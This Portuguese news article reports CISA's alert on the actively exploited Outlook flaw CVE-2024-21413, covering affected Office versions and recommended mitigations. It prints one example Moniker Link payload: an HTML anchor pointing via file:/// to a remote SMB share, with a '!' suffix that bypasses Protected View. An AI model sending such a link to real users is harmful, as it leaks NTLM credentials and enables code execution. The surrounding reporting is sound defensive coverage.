Ameaça cibernética

Falha crítica no Outlook permite ataques RCE e é explorada ativamente

Uma falha de segurança no Microsoft Outlook, identificada como CVE-2024-21413, está sendo explorada em ataques ativos. A vulnerabilidade permite a execução remota de código, colocando sistemas em risco. A CISA alertou agências federais para aplicarem correções até 27 de fevereiro.

07/02/2025 07:00

A Agência de Segurança Cibernética e de Infraestrutura dos EUA (CISA) alertou sobre a exploração ativa de uma vulnerabilidade crítica no Microsoft Outlook, identificada como CVE-2024-21413. A falha, descoberta pelo pesquisador Haifei Li, da Check Point, permite a execução remota de código (RCE), comprometendo sistemas através de e-mails com links maliciosos.

Microsoft Outlook enfrenta falha crítica explorada em ataques RCE

novo-phishing-zerofont-faz-e-mails-maliciosos-parecerem-verificados-com-seguranca-pelas-ferramentas-de-seguranca-do-outlook

Como funciona a vulnerabilidade

O problema está relacionado à validação inadequada de entrada ao abrir e-mails que contêm links maliciosos. O erro permite que atacantes contornem o Modo de Exibição Protegido, uma camada de segurança que impede a execução de conteúdo prejudicial ao abrir arquivos do Office em modo somente leitura. Dessa forma, os arquivos são carregados diretamente no modo de edição, facilitando a execução de comandos maliciosos.

Além disso, o Painel de Visualização do Outlook também é um vetor de ataque, permitindo a exploração da falha apenas ao visualizar um documento malicioso.

Exploração por meio do Moniker Link

A Check Point detalhou como hackers utilizam um método conhecido como Moniker Link para contornar as proteções do Outlook. Eles incorporam links maliciosos em e-mails usando o protocolo “file://” e adicionam um ponto de exclamação após a extensão do arquivo para enganar o sistema de segurança. Um exemplo disso seria:

<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>

Dessa forma, arquivos do Office modificados podem ser explorados para roubo de credenciais NTLM e execução de código malicioso.

Produtos afetados e impacto

A falha impacta diversas versões do Microsoft Office, incluindo:

Microsoft Office LTSC 2021
Microsoft 365 Apps for Enterprise
Microsoft Outlook 2016
Microsoft Office 2019

Ataques bem-sucedidos explorando essa vulnerabilidade podem resultar na execução arbitrária de códigos maliciosos e roubo de credenciais, afetando empresas e usuários individuais.

Ação da CISA e recomendações

A CISA incluiu o CVE-2024-21413 em seu catálogo de Vulnerabilidades Exploradas Conhecidas (KEV) e determinou que agências federais dos EUA corrijam a falha até 27 de fevereiro, conforme a diretriz Binding Operational Directive (BOD) 22-01.

Para mitigar riscos, é recomendável:

Aplicar as correções de segurança disponibilizadas pela Microsoft.
Desativar o Painel de Visualização no Outlook.
Restringir o uso do protocolo “file://” em ambientes corporativos.
Monitorar atividades suspeitas relacionadas a documentos do Office.

Embora o alerta seja voltado para agências governamentais, empresas privadas também são fortemente recomendadas a aplicar as atualizações e reforçar suas medidas de segurança para evitar comprometimentos.

Com o aumento das ameaças cibernéticas, a aplicação rápida de patches e boas práticas de segurança são fundamentais para proteger sistemas e dados contra ataques em evolução.

Jardeson Márcio

Mais Notícias

Mais artigos

Segurança cibernética

Hackers exploram falha no PHP para espalhar Quasar RAT e XMRig

Cibercriminosos estão explorando a vulnerabilidade CVE-2024-4577 no PHP para distribuir trojans e mineradores de criptomoedas. A falha permite a execução remota de código malicioso em sistemas Windows no modo CGI. Atualizar o PHP é essencial para mitigar riscos.

Alerta cibernético

Hack em GitHub Action desencadeia ataque em cascata na cadeia de suprimentos

Um ataque em cascata na cadeia de suprimentos começou com a violação da ação "reviewdog/action-setup@v1" no GitHub, resultando na exposição de segredos de CI/CD. Pesquisadores da Wiz identificaram o ataque e recomendam medidas para mitigar riscos futuros.

Alerta crítico

Falha crítica permite ataques RCE no Apache Tomcat

Uma vulnerabilidade crítica no Apache Tomcat (CVE-2025-24813) está sendo explorada ativamente, permitindo execução remota de código sem autenticação. Atualizações e medidas de mitigação são recomendadas.

Atenção devs!

Nova vulnerabilidade em biblioteca ruby-saml compromete autenticação no GitLab

A vulnerabilidade na biblioteca ruby-saml permite ataques que burlam a autenticação no GitLab. Entenda os riscos e como se proteger!

Logotipo do GitHub em destaque, cercado por um fundo escuro com linhas coloridas em movimento, representando a inovação tecnológica e a dinâmica do desenvolvimento de software.

Vulnerabilidades críticas

GitHub encontra falhas no ruby-saml que permitem ataques de conta

O GitHub revelou vulnerabilidades críticas no ruby-saml que permitem ataques de conta ao explorar falhas na autenticação SAML. As versões afetadas devem ser atualizadas imediatamente para evitar riscos de segurança e possíveis sequestros de contas.

Falha crítica

Facebook alerta sobre falha crítica no FreeType 2 explorada por hackers

Facebook revela uma falha crítica no FreeType 2 que permite a execução arbitrária de código. A vulnerabilidade, identificada como CVE-2025-27363, já foi explorada em ataques. Usuários devem atualizar para a versão mais recente para evitar riscos.